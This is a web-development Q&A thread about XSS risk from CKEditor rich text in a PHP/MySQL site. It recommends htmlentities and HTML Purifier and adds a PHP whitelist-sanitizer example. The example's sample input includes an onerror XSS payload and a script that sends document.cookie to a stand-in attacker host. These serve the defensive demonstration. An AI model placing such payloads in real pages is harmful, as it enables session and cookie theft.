Rich text and parameterized queries, should I be worried?
For this particular project I will be using PHP 5.3 & MySQL with parameterized queries and CKE Editor.
A little background on what my situation is:
The users on the site don't interact with each other.
All the users have private conversations with me only (confidential information), which contain richtext.
I've limited the CKE editor to limit the user to basic html, bold, images and miscellaneous formatting.
Now, two things:
1.) Do I still need some form of validation? If a user tries to input html or php or any other code in the rich text form, could it have any possible effect on my site? Or will it just be outputted as simple text once it's echo'd from the database?
2.) Is there anything else I should be worried about?
I haven't started on the project yet so I'm asking this to be prepared when I get to the user input part.
What do you recommend I do in my situation?
1.) Do I still need some form of validation? If a user tries to input html or php or any other code in the rich text form, could it have any possible effect on my site? Or will it just be outputted as simple text once it's echo'd from the database?
Definitely you should, there are a number of ways to bypass those ways using unicode, hex and more formats.
2.) Is there anything else I should be worried about?
You should be worried about Cross-Site Scripting (XSS). You need to use the htmlentities function at the minimum.
echo htmlentities($text, ENT_QUOTES, "UTF-8");
Possible Solution:
You can use HTML Purifier:
HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited,
secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.
Useful Resources:
- PHP Security Guide
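A worked example of the points in this answer, added here and not part of the original answer or of HTML Purifier: the parameterized query protects the SQL statement only, htmlentities makes the stored string safe but turns the rich text back into visible tags, and a small whitelist filter is what it takes to render rich text without the script and event-handler payloads. The filter is a deliberately minimal stand-in for HTML Purifier, not a replacement for it. The script assumes PHP 7 or later with PDO and the DOM extension; the SQLite in-memory DSN and the sample message are constructed so that it runs offline.

```php
<?php
declare(strict_types=1);

// Constructed sample input: what a user could submit through the rich-text editor.
$submitted = '<p>Hello <b>there</b></p>'
    . '<img src="x" onerror="alert(1)">'          // event handler on an allowed tag
    . '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// 1. Storing: the parameterized query keeps the text out of the SQL grammar.
//    That is all it does; the stored string is unchanged and still dangerous on output.
$pdo = new PDO('sqlite::memory:');   // constructed stand-in for the MySQL DSN
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE messages (id INTEGER PRIMARY KEY, body TEXT)');
$stmt = $pdo->prepare('INSERT INTO messages (body) VALUES (:body)');
$stmt->execute([':body' => $submitted]);

$stored = $pdo->query('SELECT body FROM messages')->fetchColumn();

// 2a. Output as plain text: htmlentities neutralises everything, including the
//     markup the user legitimately entered, so the rich text shows up as raw tags.
function renderPlain(string $text): string
{
    return htmlentities($text, ENT_QUOTES, 'UTF-8');
}

// 2b. Output as rich text: keep a whitelist of tags and attributes and drop the
//     rest. Illustration only; HTML Purifier covers far more cases than this.
function renderRich(string $html): string
{
    // tag => attributes allowed on that tag (hypothetical list for this example)
    $allowedTags = ['p' => [], 'b' => [], 'i' => [], 'strong' => [], 'em' => [],
                    'br' => [], 'ul' => [], 'ol' => [], 'li' => [], 'img' => ['src', 'alt']];

    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>',
                   LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();

    $xpath = new DOMXPath($doc);
    // Walk in reverse document order so removing a node never skips a sibling.
    $nodes = iterator_to_array($xpath->query('//div/descendant::*'));
    foreach (array_reverse($nodes) as $node) {
        $tag = strtolower($node->nodeName);
        if (!isset($allowedTags[$tag])) {
            // Unknown element: drop it together with its content (script, style, ...).
            $node->parentNode->removeChild($node);
            continue;
        }
        // Strip every attribute that is not explicitly allowed for this tag
        // (this is what removes onerror, onclick, style and friends).
        foreach (iterator_to_array($node->attributes) as $attr) {
            $name = strtolower($attr->nodeName);
            if (!in_array($name, $allowedTags[$tag], true)) {
                $node->removeAttribute($attr->nodeName);
                continue;
            }
            // Only plain http(s) URLs in src, which rejects javascript: and data: URLs.
            if ($name === 'src' && !preg_match('#^https?://#i', trim($attr->nodeValue))) {
                $node->removeAttribute($attr->nodeName);
            }
        }
    }

    // Serialise the children of the wrapper div, not the wrapper itself.
    $out = '';
    foreach ($doc->getElementsByTagName('div')->item(0)->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

echo renderPlain($stored), "\n";   // every tag shown literally, nothing executes
echo renderRich($stored), "\n";    // <p>Hello <b>there</b></p><img>
```

Run it from the command line with `php example.php`. The plain rendering is the safe default for anything that is not meant to be rich text; the whitelist rendering is the shape of what the CKEditor output needs, and the reason the answer points at HTML Purifier is that a production filter also has to handle things this illustration ignores (entity-encoded attribute values, CSS in style attributes, nested or malformed markup, and URL schemes beyond a simple prefix check).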